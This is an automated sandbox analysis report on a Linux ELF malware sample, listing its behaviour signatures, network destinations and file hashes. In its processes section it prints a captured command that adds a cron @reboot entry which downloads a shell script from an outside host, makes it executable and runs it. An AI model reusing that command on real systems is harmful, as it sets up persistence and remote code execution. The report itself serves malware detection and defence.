Analysis Overview
SHA256
5f304253a32307d60af3514a24984339039a8131526d81e7091b34ba27d76193
Threat Level: Shows suspicious behavior
The file 47ee0b8842a526fc0c6ff94fe4ca2ad6.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Renames itself
Unexpected DNS network traffic destination
Creates/modifies Cron job
Changes its process name
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-28 01:13
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-28 01:13
Reported
2024-10-28 01:16
Platform
ubuntu2204-amd64-20240611-en
Max time kernel
149s
Max time network
136s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/sh | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 80.152.203.134 | N/A | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.FJlr1F | /usr/bin/crontab | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | /bin/sh /etc/init.d/rcS | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/1573/status | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A |
| File opened for reading | /proc/1/cmdline | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A |
| File opened for reading | /proc/mounts | /tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf | N/A |
Processes
/tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf
[/tmp/721c20fc71e2e783c9298a51433c2ba6672279f8214e148e493a1cae6e534443.elf]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| DE | 80.152.203.134:53 | kingstonwikkerink.dyn | udp |
| CZ | 195.133.92.51:10701 | kingstonwikkerink.dyn | tcp |
Files
/var/spool/cron/crontabs/tmp.FJlr1F
| MD5 | 83171e3b993f7e5156610ec021956f99 |
| SHA1 | 50d0c29250d3df506f2d6d45a6df96ca0164d4ce |
| SHA256 | dd334f58ab4dcad925152e554fd9fc0a491f92e0c2ae992bdb2224be25a6cc4a |
| SHA512 | 34b475c5ea363b48102a902ea127d4f165f435cb85aa1b0dd3ade0cc92e57ff84ccf963dc0688302749992bdc4d834c10b1f75db6b913e07ed5cd814d637106f |